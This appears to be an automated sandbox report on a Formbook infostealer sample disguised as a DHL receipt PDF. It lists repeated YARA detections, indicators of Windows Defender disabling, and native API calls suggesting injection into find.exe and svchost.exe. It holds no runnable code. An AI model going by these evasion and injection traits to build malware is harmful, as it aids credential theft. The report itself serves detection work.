Source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DHL_29028263 receipt document of the purchase,pdf.exe
Source: initial sample Static PE information: Filename: DHL_29028263 receipt document of the purchase,pdf.exe
.NET source code contains very large array initializations
Source: DHL_29028263 receipt document of the purchase,pdf.exe, u0036582548708/u0039910975725.cs Large array initialization: 0556637666: array initializer size 479744
Uses 32bit PE files
Source: DHL_29028263 receipt document of the purchase,pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DHL_29028263 receipt document of the purchase,pdf.exe.43b5118.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.DHL_29028263 receipt document of the purchase,pdf.exe.43b5118.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_0115997A 0_2_0115997A
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2A010 0_2_00F2A010
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F20490 0_2_00F20490
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2E570 0_2_00F2E570
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F276A0 0_2_00F276A0
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F29A88 0_2_00F29A88
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2DB88 0_2_00F2DB88
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F25EE8 0_2_00F25EE8
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2E028 0_2_00F2E028
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2047F 0_2_00F2047F
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F22748 0_2_00F22748
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Code function: 0_2_00F2F998 0_2_00F2F998
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041B8D3 2_2_0041B8D3
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041C89B 2_2_0041C89B
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041D2B8 2_2_0041D2B8
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041CC55 2_2_0041CC55
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00408C90 2_2_00408C90
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041BE24 2_2_0041BE24
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041C710 2_2_0041C710
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D2B28 2_2_032D2B28
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0323EBB0 2_2_0323EBB0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032CDBD2 2_2_032CDBD2
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D22AE 2_2_032D22AE
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03224120 2_2_03224120
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0320F900 2_2_0320F900
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032C1002 2_2_032C1002
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032320A0 2_2_032320A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D20A8 2_2_032D20A8
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321B090 2_2_0321B090
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D1FF1 2_2_032D1FF1
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03226E30 2_2_03226E30
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D2EF7 2_2_032D2EF7
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03200D20 2_2_03200D20
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D2D07 2_2_032D2D07
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032D1D55 2_2_032D1D55
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03232581 2_2_03232581
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321D5E0 2_2_0321D5E0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0321841F 2_2_0321841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0375EBB0 14_2_0375EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03746E30 14_2_03746E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037F1D55 14_2_037F1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03720D20 14_2_03720D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03744120 14_2_03744120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0372F900 14_2_0372F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373D5E0 14_2_0373D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_03752581 14_2_03752581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373841F 14_2_0373841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_037E1002 14_2_037E1002
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_0373B090 14_2_0373B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029ED2B8 14_2_029ED2B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EC89B 14_2_029EC89B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EB8D3 14_2_029EB8D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EBE24 14_2_029EBE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029D2FB0 14_2_029D2FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029EC711 14_2_029EC711
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029D8C90 14_2_029D8C90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029ECC55 14_2_029ECC55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029D2D90 14_2_029D2D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 14_2_029D2D87 14_2_029D2D87
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0372B150 appears 32 times
Source: C:\Windows\SysWOW64\find.exe Code function: String function: 0320B150 appears 35 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004185F0 NtCreateFile, 2_2_004185F0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004186A0 NtReadFile, 2_2_004186A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_00418720 NtClose, 2_2_00418720
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004187D0 NtAllocateVirtualMemory, 2_2_004187D0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004185EB NtCreateFile, 2_2_004185EB
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_0041869A NtReadFile, 2_2_0041869A
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_004187CD NtAllocateVirtualMemory, 2_2_004187CD
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249A20 NtResumeThread,LdrInitializeThunk, 2_2_03249A20
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_03249A00
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249A50 NtCreateFile,LdrInitializeThunk, 2_2_03249A50
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_03249910
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032499A0 NtCreateSection,LdrInitializeThunk, 2_2_032499A0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03249860
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249840 NtDelayExecution,LdrInitializeThunk, 2_2_03249840
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_032498F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_032498F0
Source: C:\Windows\SysWOW64\find.exe Code function: 2_2_03249710 NtQueryInformationToken,LdrInitializeThunk, 2_2_03249710
